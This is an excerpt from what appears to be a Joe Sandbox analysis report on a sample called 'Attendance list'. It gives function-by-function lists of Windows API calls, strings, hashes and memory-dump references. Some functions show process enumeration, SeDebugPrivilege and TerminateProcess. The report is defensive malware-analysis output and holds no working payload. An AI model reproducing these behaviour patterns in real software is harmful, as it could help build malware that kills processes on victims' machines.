                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                        • String ID:
                        • API String ID: 793581249-0
                        • Opcode ID: 4ebafaf72ad3baf8490594ca2c3c57d2480c6f779b90ddb0b8918f7f3cd6800b
                        • Instruction ID: 5362d34a072bd16f6c53faa5cb49f995e818ba2e573f5d21283549e0f142b26c
                        • Opcode Fuzzy Hash: 4ebafaf72ad3baf8490594ca2c3c57d2480c6f779b90ddb0b8918f7f3cd6800b
                        • Instruction Fuzzy Hash: 1B513FB20087959BC724EB64DC81ADFB3ECEF85341F00492EB189D7156EE74E6888766
                        Function 009488B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                        Download Yara Rule
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0094896E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        • Opcode ID: cd6eafa4e9d797c220f69759c49e3ed4c4fcd344b312db865e6e698bc2567971
                        • Instruction ID: 640a5fa85d88038a5a2c0dba9b7bd240acea5e987b62602b514c14df04a843fc
                        • Opcode Fuzzy Hash: cd6eafa4e9d797c220f69759c49e3ed4c4fcd344b312db865e6e698bc2567971
                        • Instruction Fuzzy Hash: C7518130614209BBEF349F28CC85FAF7BA9FB05360F604516F515E62A1DFB5E9809B81
                        Function 008C2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 008FC547
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008FC569
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008FC581
                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 008FC59F
                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008FC5C0
                        • DestroyIcon.USER32(00000000), ref: 008FC5CF
                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008FC5EC
                        • DestroyIcon.USER32(?), ref: 008FC5FB
                          • Part of subcall function 0094A71E: DeleteObject.GDI32(00000000), ref: 0094A757
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                        • String ID:
                        • API String ID: 2819616528-0
                        • Opcode ID: 356ff21c95701fc1a1323b65c539bfe2a1017f88c20d171954f920752a5b2272
                        • Instruction ID: 4e8b32c89d2c88bd968d2715d38f0f21258d4f04695bc6a302280c716e0b1b42
                        • Opcode Fuzzy Hash: 356ff21c95701fc1a1323b65c539bfe2a1017f88c20d171954f920752a5b2272
                        • Instruction Fuzzy Hash: 0F512474A14209AFDB24DF24DC45FAA7BB5FB58364F104528F906E72A0DB70ED90EB60
                        Function 00918E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00918A84,00000B00,?,?), ref: 00918E0C
                        • HeapAlloc.KERNEL32(00000000,?,00918A84,00000B00,?,?), ref: 00918E13
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00918A84,00000B00,?,?), ref: 00918E28
                        • GetCurrentProcess.KERNEL32(?,00000000,?,00918A84,00000B00,?,?), ref: 00918E30
                        • DuplicateHandle.KERNEL32(00000000,?,00918A84,00000B00,?,?), ref: 00918E33
                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00918A84,00000B00,?,?), ref: 00918E43
                        • GetCurrentProcess.KERNEL32(00918A84,00000000,?,00918A84,00000B00,?,?), ref: 00918E4B
                        • DuplicateHandle.KERNEL32(00000000,?,00918A84,00000B00,?,?), ref: 00918E4E
                        • CreateThread.KERNEL32(00000000,00000000,00918E74,00000000,00000000,00000000), ref: 00918E68
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        • Opcode ID: 23d4c287d42ed457027b91fbbba8fcacb0e48f5cd46e5e93d952d68fabe8c3fe
                        • Instruction ID: f85e72a1b332d32650e7dc040e6fe0b89bbc0b5af87768017c716ac763f21525
                        • Opcode Fuzzy Hash: 23d4c287d42ed457027b91fbbba8fcacb0e48f5cd46e5e93d952d68fabe8c3fe
                        • Instruction Fuzzy Hash: 0801BBB9258309FFE710ABA5DC4DF6B3BACEB89711F004421FA05DB1A1CA709800DB60
                        Function 00939428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$_memset
                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 2862541840-625585964
                        • Opcode ID: 360672f64dd6497fefeebaaf98914605ebb2a0bacd1aa33e6d21c5d330a00e8a
                        • Instruction ID: 5ed66bd94d4b08be097948a85084f7989fefe62be88b66392cd30e7cc565452c
                        • Opcode Fuzzy Hash: 360672f64dd6497fefeebaaf98914605ebb2a0bacd1aa33e6d21c5d330a00e8a
                        • Instruction Fuzzy Hash: 5891D171A00219AFDF24DFA5C849FAFB7B8EF85314F108559F909AB290D7B09945CFA0
                        Function 00939A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00917652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?,?,0091799D), ref: 0091766F
                          • Part of subcall function 00917652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?), ref: 0091768A
                          • Part of subcall function 00917652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?,?), ref: 00917698
                          • Part of subcall function 00917652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0091758C,80070057,?), ref: 009176A8
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00939B1B
                        • _memset.LIBCMT ref: 00939B28
                        • _memset.LIBCMT ref: 00939C6B
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00939C97
                        • CoTaskMemFree.OLE32(?), ref: 00939CA2
                        Strings
                        • NULL Pointer assignment, xrefs: 00939CF0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                        • String ID: NULL Pointer assignment
                        • API String ID: 1300414916-2785691316
                        • Opcode ID: f4639c8a837b7151ee7e4edf1371d4f9c1f7047c667a52a9e30ba4bb7a867773
                        • Instruction ID: 6e3097a89e4d18a18549d5ac9927bd091da8cfc7efa5bd62d2b325de674dc7fd
                        • Opcode Fuzzy Hash: f4639c8a837b7151ee7e4edf1371d4f9c1f7047c667a52a9e30ba4bb7a867773
                        • Instruction Fuzzy Hash: BD911471900229ABDB10DFA5D885FDEBBB9FF08710F20415AF519A7281DB71AA44CFA1
                        Function 00946FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00947093
                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 009470A7
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009470C1
                        • _wcscat.LIBCMT ref: 0094711C
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00947133
                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00947161
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcscat
                        • String ID: SysListView32
                        • API String ID: 307300125-78025650
                        • Opcode ID: 312611215c63085c33c57ab0c72ce9bc5ea5c9b7503507f1fc6b35ea2372e61a
                        • Instruction ID: c323a6e38674dd34017c5f45743026caff2faaea72d21a5385a31fe0649a6e46
                        • Opcode Fuzzy Hash: 312611215c63085c33c57ab0c72ce9bc5ea5c9b7503507f1fc6b35ea2372e61a
                        • Instruction Fuzzy Hash: 5841807190430DAFEB219FA4CC85FEAB7ACEF48354F10452AF548E7292D7729D848B60
                        Function 0093EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00923E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00923EB6
                          • Part of subcall function 00923E91: Process32FirstW.KERNEL32(00000000,?), ref: 00923EC4
                          • Part of subcall function 00923E91: CloseHandle.KERNEL32(00000000), ref: 00923F8E
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0093ECB8
                        • GetLastError.KERNEL32 ref: 0093ECCB
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0093ECFA
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0093ED77
                        • GetLastError.KERNEL32(00000000), ref: 0093ED82
                        • CloseHandle.KERNEL32(00000000), ref: 0093EDB7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                        • String ID: SeDebugPrivilege
                        • API String ID: 2533919879-2896544425
                        • Opcode ID: e9affd1f5a86b1d9dd065143bcf1601b057bc7eb02dbd7c29c75499d75ecca1e
                        • Instruction ID: dc38a9a78b6544b6db547c7a01343b79731f12fbe9b3ff70c1c97da0e9e0a8a9
                        • Opcode Fuzzy Hash: e9affd1f5a86b1d9dd065143bcf1601b057bc7eb02dbd7c29c75499d75ecca1e
                        • Instruction Fuzzy Hash: 3841BB316042119FDB14EF28CCA5F6EB7A4EF80714F08845DF9869B2C2CBB4A804CF96
                        Function 00923226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(00000000,00007F03), ref: 009232C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2457776203-404129466
                        • Opcode ID: 72fd0fcf7841c6558933f6cde04007db4e3f2498e05d888691c531bd6f65e1c2
                        • Instruction ID: 81cb9e4c50d4d738bb74f890a3d4cdc770b8664415379158395223945a97ccde
                        • Opcode Fuzzy Hash: 72fd0fcf7841c6558933f6cde04007db4e3f2498e05d888691c531bd6f65e1c2
                        • Instruction Fuzzy Hash: 28112B3230C3A6FAE7015A55FC42C6EB3DCEF1A774F20802AF524A6181D66DAF4045A6
                        Function 00924534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0092454E
                        • LoadStringW.USER32(00000000), ref: 00924555
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0092456B
                        • LoadStringW.USER32(00000000), ref: 00924572
                        • _wprintf.LIBCMT ref: 00924598
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009245B6
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 00924593
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wprintf
                        • String ID: %s (%d) : ==> %s: %s %s
                        • API String ID: 3648134473-3128320259
                        • Opcode ID: 5bf095981a3fb3a19a31c76cd00571b122708f6c79a6cd7b573cc27a8cec83b4
                        • Instruction ID: 85636f2de7cadf2c147e3a492c88c144719bb03effb2ed050541edd4874ea5e2
                        • Opcode Fuzzy Hash: 5bf095981a3fb3a19a31c76cd00571b122708f6c79a6cd7b573cc27a8cec83b4
                        • Instruction Fuzzy Hash: E90162F790421DBFE710E7A4DD89EE7776CEB09301F0005A5BB49E2051EA749E858B71
                        Function 0094D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • GetSystemMetrics.USER32(0000000F), ref: 0094D78A
                        • GetSystemMetrics.USER32(0000000F), ref: 0094D7AA
                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0094D9E5
                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0094DA03
                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0094DA24
                        • ShowWindow.USER32(00000003,00000000), ref: 0094DA43
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0094DA68
                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0094DA8B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                        • String ID:
                        • API String ID: 1211466189-0
                        • Opcode ID: bc7321334e8c6a685ad8aae04abffd70ccdb60a06ab84827b58168869f837569
                        • Instruction ID: 138818aabfe9f722c4c910143689fe235eaba862904169ac4d60b9f26c5075ba
                        • Opcode Fuzzy Hash: bc7321334e8c6a685ad8aae04abffd70ccdb60a06ab84827b58168869f837569
                        • Instruction Fuzzy Hash: 5DB1887960122AEFDF18CF68C985BBD7BB5FF45701F088069EC489B295D734AA50CB90
                        Function 008C2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008FC417,00000004,00000000,00000000,00000000), ref: 008C2ACF
                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,008FC417,00000004,00000000,00000000,00000000,000000FF), ref: 008C2B17
                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,008FC417,00000004,00000000,00000000,00000000), ref: 008FC46A
                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008FC417,00000004,00000000,00000000,00000000), ref: 008FC4D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ShowWindow
                        • String ID:
                        • API String ID: 1268545403-0
                        • Opcode ID: 5cd4296179678a923bedf3806bd4bb067f36cf6692dcd932c4615e0fbf2c6a14
                        • Instruction ID: dd22f8b673f4ea91e911a49b6c3f497ac2a81c3582b66ade8915d3db79956684
                        • Opcode Fuzzy Hash: 5cd4296179678a923bedf3806bd4bb067f36cf6692dcd932c4615e0fbf2c6a14
                        • Instruction Fuzzy Hash: 654116302186989AC7398B389DA8F7F7BB2FF96314F18881DE147C66E0C675E841D711
                        Function 00927368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0092737F
                          • Part of subcall function 008E0FF6: std::exception::exception.LIBCMT ref: 008E102C
                          • Part of subcall function 008E0FF6: __CxxThrowException@8.LIBCMT ref: 008E1041
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009273B6
                        • EnterCriticalSection.KERNEL32(?), ref: 009273D2
                        • _memmove.LIBCMT ref: 00927420
                        • _memmove.LIBCMT ref: 0092743D
                        • LeaveCriticalSection.KERNEL32(?), ref: 0092744C
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00927461
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00927480
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                        • String ID:
                        • API String ID: 256516436-0
                        • Opcode ID: f77bc8c24f75ac36097f46e4e4505bec05978fa26304b895c1a63131b87da509
                        • Instruction ID: bc8a0adfa716a8fdea8c37b79ea172cd25110e8ec723e8aa5d318dab94191f54
                        • Opcode Fuzzy Hash: f77bc8c24f75ac36097f46e4e4505bec05978fa26304b895c1a63131b87da509
                        • Instruction Fuzzy Hash: DD319235908106EBCF10EF99DC85EAFB7B8FF45310B1441A5F904EB256DB709A50DBA1
                        Function 00946442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 0094645A
                        • GetDC.USER32(00000000), ref: 00946462
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0094646D
                        • ReleaseDC.USER32(00000000,00000000), ref: 00946479
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009464B5
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009464C6
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00949299,?,?,000000FF,00000000,?,000000FF,?), ref: 00946500
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00946520
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        • Opcode ID: bcfaa29ecccd950f6250d3e1a16f9265b6f18659ab6bb34bb44d2a1a5ae224a9
                        • Instruction ID: ecb5c13d045559cabb10bb7d921b0279225e5793a8c03ea365b8ce752e3dbb2d
                        • Opcode Fuzzy Hash: bcfaa29ecccd950f6250d3e1a16f9265b6f18659ab6bb34bb44d2a1a5ae224a9
                        • Instruction Fuzzy Hash: 26318976215214BFEF208F10CC8AFEB3FADEF4A765F050065FE089A2A1C6759841CB60
                        Function 0091C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        • Opcode ID: e128f52eeb5ee3fa02d0d0b325153998120dfc52b11ea86ace8a43c62c5357ee
                        • Instruction ID: 7831734d2a60a980ed5df68b63a7a2218b5dd32011598145466eb9e6dad0b755
                        • Opcode Fuzzy Hash: e128f52eeb5ee3fa02d0d0b325153998120dfc52b11ea86ace8a43c62c5357ee
                        • Instruction Fuzzy Hash: B82107F27C420DB7DA10E6268D46FFB239CEF66399B040020FD09D6293E761DD55C2A2
                        Function 0092ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                          • Part of subcall function 008DFEC6: _wcscpy.LIBCMT ref: 008DFEE9
                        • _wcstok.LIBCMT ref: 0092EEFF
                        • _wcscpy.LIBCMT ref: 0092EF8E
                        • _memset.LIBCMT ref: 0092EFC1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
